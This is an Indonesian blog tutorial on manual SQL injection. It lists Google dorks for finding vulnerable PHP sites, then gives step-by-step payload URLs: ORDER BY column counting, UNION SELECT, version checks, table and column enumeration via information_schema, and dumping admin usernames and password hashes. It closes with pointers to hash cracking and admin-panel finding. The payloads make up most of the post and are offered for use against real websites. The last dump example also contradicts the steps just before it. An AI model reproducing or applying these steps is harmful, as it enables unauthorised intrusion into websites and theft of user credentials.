Manual Sql Injection by AnonMosT


Assalamualaikum, samlekum , P, shalom , saya AnonMosT di artikel ini saya akan menjelaskan bagaimana caranya menexploitasi web dengan cara sqli manual , gak usah bacod langsung ke tutor yekan :v

Siapkan dork disini saya kasih contoh aja , selanjutnya bisa kalian kembangkan dengan otak mesum kalian

Dork:
intext:"Powered by Alsovalue"inurl:/.php?id= 
inurl:pageid= 
inurl:games.php?id= 
inurl:page.php?file=

Dorking dulu yekan abis itu kalian kalau mau cek vuln apa engga nya tinggal tambahkan ' pada ujung url contohnya gini ya beb :v


www.abcdefgh.com/page.php?id=12'

Nah jika ada tulisan Error in my SQL atau sebagai nya berarti vuln ya 

Setelah itu tambahkan
+order+by+1--
Misalkan:
www.abcdefgh.com/page.php?id=12+order+by+1--

Nah jika belum ketemu Error nya kalian lanjutkan menjadi 
www.abcdefgh.com/page.php?id=12+order+by+2--

Nah misalkan Error nya di angka 10 maka colum nya ada 9 ( contohnya error bertuliskan , nothing colums 10  the web/server)

Nah berarti colum nya ada 9 maka kita tambahkan +union+select+

Misalkan 
www.abcdefgh.com/page.php?id=-12+union+select+1,2,3,4,5,6,7,8,9--

Jangan lupa tambahin - dibelakang angka yg ada setelah = 
Coba lihat angka 12 , di belakang nya ada -

Nah misalkan angka yg keluar itu angka 4 nah maka angka 4 itu kalian ganti dengan 

@@version

Contohnya

www.abcdefgh.com/page.php?id=-12+union+select+1,2,3,@@version,5,6,7,8,9--

Jika versi 5 keatas kalian bisa melanjutkan karena ini mudah :v

@@version ganti yekan sama group_concat(table_name)


Dan angka akhir ganti ama 
+from+information_schema.tables+where+table_schema=database()

Contohnya

www.abcdefgh.com/page.php?id=-12+union+select+1,2,3,group_concat(table_name),5,6,7,8,9+from+information_schema.tables+where+table_schema=database()--

Setelahnya kalian akan dapat nama.nama table di web tersebut

Misalkan

users,dosen,news,page,

Nah kalian cari tab yg menurut kalian itu tab admin ,.misalkan tab users adalah tab admin 
Lalu kalian ganti 

group_concat(table_name) dengan 
group_concat(column_name)

Dan 
+from+information_schema.tables+where+table_schema=database() gantikan dengan 

+from+information_schema.columns+where+table_name=

Mengapa database() tidak tercantum? Database() kita ubah dengan nama table yg sudah di ganti dengan huruf decimal/ASCII


Kalian bisa mendownload aplikasi ASCII converter atau di website yang menyediakan ASCII misalkan users jika diubah jadi 117 115 101 114 115 dan jangan lupa di tambahkan CHAR setelah =  dan , setelah angka decimal

Jadi contohnya begini 


www.abcdefgh.com/page.php?id=-12+union+select+1,2,3,group_concat(column_name),5,6,7,8,9+from+information_schema.columns+where+table_name=CHAR(117, 115, 101, 114, 115)--

Setelah itu kalian akan dapat nama² dari isi tabel users

Contohnya

user,pass,login,cc,kegiatan,dashboard

Nah username dan password nya pasti ada di table user dan pass 
Untuk melihatnya 

Ganti

group_concat(column_name) dengan 
group_concat(user,0x3a,pass) user dan pass adalah nama table yg menyimpan user dan password jika table yg menyimpan usser dan pw berbeda silahkan ganti


Dan juga 
+from+information_schema.columns+where+table_name=CHAR(117, 115, 101, 114, 115)-- 
Ganti dengan from+users


Jadi contohnya


www.abcdefgh.com/page.php?id=-12+union+select+1,2,3,group_concat(column_name),5,6,7,8,9+from+users--


Misalkan 

Usser: dosen345
Password: e4d909c290d0fb1ca068ffaddf22cbd0

Jika masih dalam bentuk kode kalian bisa hash di crackstation.net

Untuk mencari adlog kalian bisa mencari di aplikasi anon hackbar

Terimakasih telah membaca artikel ini maaf jika ada kesalahan karena saya ketik ini di malam hari 

Thanks to Attacker Network Team









Berlangganan update artikel terbaru via email:

Iklan Atas Artikel

Iklan Tengah Artikel 1

Iklan Tengah Artikel 2

Iklan Bawah Artikel